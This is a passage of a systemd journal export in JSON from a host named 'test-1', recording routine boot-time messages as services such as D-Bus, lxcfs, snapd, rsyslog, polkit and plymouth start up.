: "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: Record successful boot for GRUB...", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818151385" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=317;b=e2b08827b5804427b422c10c84f1567e;m=2a6324e;t=5bd16df69b1b6;x=406920915460381", "__REALTIME_TIMESTAMP" : "1615280818729398", "__MONOTONIC_TIMESTAMP" : "44446286", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started FUSE filesystem for LXC.", "UNIT" : "lxcfs.service", "INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818160126" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=318;b=e2b08827b5804427b422c10c84f1567e;m=2a63297;t=5bd16df69b1ff;x=a8ac43dca251c82f", "__REALTIME_TIMESTAMP" : "1615280818729471", "__MONOTONIC_TIMESTAMP" : "44446359", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started D-Bus System Message Bus.", "UNIT" : "dbus.service", "INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818169699" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=319;b=e2b08827b5804427b422c10c84f1567e;m=2a632fd;t=5bd16df69b264;x=797028d2a0721f41", "__REALTIME_TIMESTAMP" : "1615280818729572", "__MONOTONIC_TIMESTAMP" : "44446461", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "MESSAGE" : "Watching system buttons on /dev/input/event0 (Power Button)", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270222" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31a;b=e2b08827b5804427b422c10c84f1567e;m=2a63468;t=5bd16df69b3cf;x=c81d19038f20e303", "__REALTIME_TIMESTAMP" : "1615280818729935", "__MONOTONIC_TIMESTAMP" : "44446824", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", 
"_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270478" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31b;b=e2b08827b5804427b422c10c84f1567e;m=2a634c0;t=5bd16df69b428;x=5665e3444908c6b1", "__REALTIME_TIMESTAMP" : "1615280818730024", "__MONOTONIC_TIMESTAMP" : "44446912", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-seat.c", "CODE_LINE" : "424", "CODE_FUNC" : "seat_start", "MESSAGE_ID" : "fcbefc5da23d428093f97c82a9290f7b", "SEAT_ID" : "seat0", "MESSAGE" : "New seat seat0.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31c;b=e2b08827b5804427b422c10c84f1567e;m=2a6352c;t=5bd16df69b493;x=566b08c1e3e04161", "__REALTIME_TIMESTAMP" : "1615280818730131", "__MONOTONIC_TIMESTAMP" : "44447020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Snappy daemon...", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818338766" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31d;b=e2b08827b5804427b422c10c84f1567e;m=2a63582;t=5bd16df69b4ea;x=85a338f5b6a97b6d", "__REALTIME_TIMESTAMP" : "1615280818730218", "__MONOTONIC_TIMESTAMP" : "44447106", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Permit User Sessions...", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818344557" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31e;b=e2b08827b5804427b422c10c84f1567e;m=2a635d3;t=5bd16df69b53a;x=80321e018d4924f9", "__REALTIME_TIMESTAMP" : "1615280818730298", "__MONOTONIC_TIMESTAMP" : 
"44447187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "Started System Logging Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818352740" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31f;b=e2b08827b5804427b422c10c84f1567e;m=2a6361b;t=5bd16df69b583;x=37287d3f7131b98f", "__REALTIME_TIMESTAMP" : "1615280818730371", "__MONOTONIC_TIMESTAMP" : "44447259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "MESSAGE" : "Started Permit User Sessions.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280818367486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=320;b=e2b08827b5804427b422c10c84f1567e;m=2a639f5;t=5bd16df69b95d;x=f8b3d302d5b0ac25", "__REALTIME_TIMESTAMP" : "1615280818731357", "__MONOTONIC_TIMESTAMP" : "44448245", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Started Login Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818386163" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=321;b=e2b08827b5804427b422c10c84f1567e;m=2a63a5a;t=5bd16df69b9c1;x=a44c1ff0b2d9943a", "__REALTIME_TIMESTAMP" : "1615280818731457", "__MONOTONIC_TIMESTAMP" : "44448346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", 
"_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Authorization Manager...", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818393304" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=322;b=e2b08827b5804427b422c10c84f1567e;m=2a63aa7;t=5bd16df69ba0e;x=93403d3ec28c7d8e", "__REALTIME_TIMESTAMP" : "1615280818731534", "__MONOTONIC_TIMESTAMP" : "44448423", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Unattended Upgrades Shutdown.", "UNIT" : "unattended-upgrades.service", "INVOCATION_ID" : "64957dc245ff4da68583f884d2b6aa74", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818400923" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=323;b=e2b08827b5804427b422c10c84f1567e;m=2a63b03;t=5bd16df69ba6b;x=9707bf8b74d46972", "__REALTIME_TIMESTAMP" : "1615280818731627", "__MONOTONIC_TIMESTAMP" : "44448515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hostname Service...", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818410195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=324;b=e2b08827b5804427b422c10c84f1567e;m=2a63b70;t=5bd16df69bad8;x=85db8a79d2d07ec9", "__REALTIME_TIMESTAMP" : "1615280818731736", "__MONOTONIC_TIMESTAMP" : "44448624", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Terminate Plymouth Boot Screen...", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818417474" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=325;b=e2b08827b5804427b422c10c84f1567e;m=2a63bd1;t=5bd16df69bb38;x=81711fd38359bea3", "__REALTIME_TIMESTAMP" : "1615280818731832", "__MONOTONIC_TIMESTAMP" : "44448721", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", 
"SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hold until boot process finishes up...", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818422758" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=326;b=e2b08827b5804427b422c10c84f1567e;m=2a63c48;t=5bd16df69bbb0;x=9d8e718c053be8b2", "__REALTIME_TIMESTAMP" : "1615280818731952", "__MONOTONIC_TIMESTAMP" : "44448840", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "MESSAGE" : "Started Hold until boot process finishes up.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818433141" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=327;b=e2b08827b5804427b422c10c84f1567e;m=2a63cc0;t=5bd16df69bc27;x=1c70448b37921d8c", "__REALTIME_TIMESTAMP" : "1615280818732071", "__MONOTONIC_TIMESTAMP" : "44448960", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Serial Getty on ttyS0.", "UNIT" : "serial-getty@ttyS0.service", "INVOCATION_ID" : "6962682f850d410ab6ab4947892896cc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818438851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=328;b=e2b08827b5804427b422c10c84f1567e;m=2a63d13;t=5bd16df69bc7b;x=75b6885bd4fa244b", "__REALTIME_TIMESTAMP" : "1615280818732155", "__MONOTONIC_TIMESTAMP" : "44449043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", 
"_HOSTNAME" : "test-1", "MESSAGE" : "Starting Set console scheme...", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818446792" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=329;b=e2b08827b5804427b422c10c84f1567e;m=2a63d6b;t=5bd16df69bcd3;x=19536e76eaf38387", "__REALTIME_TIMESTAMP" : "1615280818732243", "__MONOTONIC_TIMESTAMP" : "44449131", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "MESSAGE" : "Started Terminate Plymouth Boot Screen.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818453725" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32a;b=e2b08827b5804427b422c10c84f1567e;m=2a63dbe;t=5bd16df69bd25;x=42e6870cfd4a68a1", "__REALTIME_TIMESTAMP" : "1615280818732325", "__MONOTONIC_TIMESTAMP" : "44449214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" 
: "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "MESSAGE" : "Started Set console scheme.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818468121" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32b;b=e2b08827b5804427b422c10c84f1567e;m=2a63e19;t=5bd16df69bd80;x=7c36cebfe0645687", "__REALTIME_TIMESTAMP" : "1615280818732416", "__MONOTONIC_TIMESTAMP" : "44449305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : 